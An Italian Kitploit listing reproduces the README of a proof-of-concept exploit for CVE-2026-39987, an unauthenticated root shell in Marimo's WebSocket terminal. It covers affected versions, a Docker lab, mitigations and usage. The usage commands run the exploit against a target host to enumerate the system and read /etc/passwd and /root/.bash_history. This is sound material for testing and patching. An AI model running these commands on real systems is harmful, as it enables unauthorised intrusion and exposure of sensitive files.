Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39987-marimo-rce — CVE-2026-39987 | Kitploit
Strumenti/GitHubGitHub/0xdeadroot/cve-2026-39987-marimo-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHub0xdeadroot/cve-2026-39987-marimo-rce

CVE-2026-39987-marimo-rce

CVE-2026-39987

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-39987 - RCE Pre-Autenticazione in Marimo

Esecuzione Remota di Codice Non Autenticata in Marimo tramite Terminale WebSocket

Critical Python Docker


📌 Panoramica

CVE-2026-39987 è una vulnerabilità critica di Esecuzione Remota di Codice Pre-Autenticazione che interessa le versioni di Marimo precedenti alla 0.23.0. L'endpoint WebSocket /terminal/ws bypassa completamente l'autenticazione, consentendo a qualsiasi utente non autenticato di ottenere una shell PTY interattiva completa con i privilegi del processo Marimo (tipicamente root in ambienti Docker).


🛠️ Dettagli della Vulnerabilità

  • ID CVE: CVE-2026-39987
  • Prodotto Affetto: Marimo (Reactive Python Notebook)
  • Versioni Affette: marimo < 0.23.0
  • Versione Corretta:
Scarica lo strumento
marimo >= 0.23.0
  • Vettore di Attacco: Rete (Non Autenticato)
  • Endpoint Affetto: /terminal/ws
  • Impatto: Shell remota completa (PTY) come root

  • ✨ Caratteristiche del PoC

    • Conversione automatica http:// → ws:// e https:// → wss://
    • Svuotamento intelligente del buffer PTY
    • Esecuzione affidabile dei comandi
    • Codice pulito, minimale e stabile
    • Pronto per test in laboratorio Docker

    📁 Struttura del Repository

    root@kitploit:~
    CVE-2026-39987/
    ├── CVE-2026-39987-poc.py          ← Main Exploit
    ├── docker-vulnerable/
    │   ├── Dockerfile
    │   └── docker-compose.yml
    ├── notebooks/                     ← Persistent notebooks (optional)
    ├── README.md
    └── LICENSE
    

    🚀 Utilizzo

    1. Installare la dipendenza

    root@kitploit:~
    pip install websocket-client
    

    2. Eseguire l'Exploit

    root@kitploit:~
    # Basic usage
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && hostname"
    
    # System enumeration
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && cat /etc/os-release && ls -la /app"
    
    # Read sensitive files
    python3 CVE-2026-39987-poc.py http://target:2718 "cat /etc/passwd && cat /root/.bash_history"
    

    🧪 Laboratorio Docker Vulnerabile

    root@kitploit:~
    cd docker-vulnerable
    docker compose up --build -d
    

    Quindi testa:

    root@kitploit:~
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami"
    

    🛡️ Mitigazione

    • Aggiornare immediatamente a marimo >= 0.23.0
    • Non esporre Marimo direttamente su internet
    • Posizionare dietro un proxy inverso con autenticazione
    • Eseguire come utente non-root quando possibile
    • Limitare l'accesso a /terminal/ws tramite firewall o regole del proxy

    ⚠️ Dichiarazione di non responsabilità

    Questo Proof of Concept è inteso esclusivamente per scopi educativi e test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Assicurati di avere il permesso esplicito prima di testare qualsiasi sistema.

    Usa eticamente e responsabilmente.


    📄 Riferimenti

    • Consulenza Ufficiale CVE
    • Repository GitHub di Marimo
    • Voce NVD (CVE-2026-39987)

    Realizzato per ricerca sulla sicurezza e divulgazione responsabile.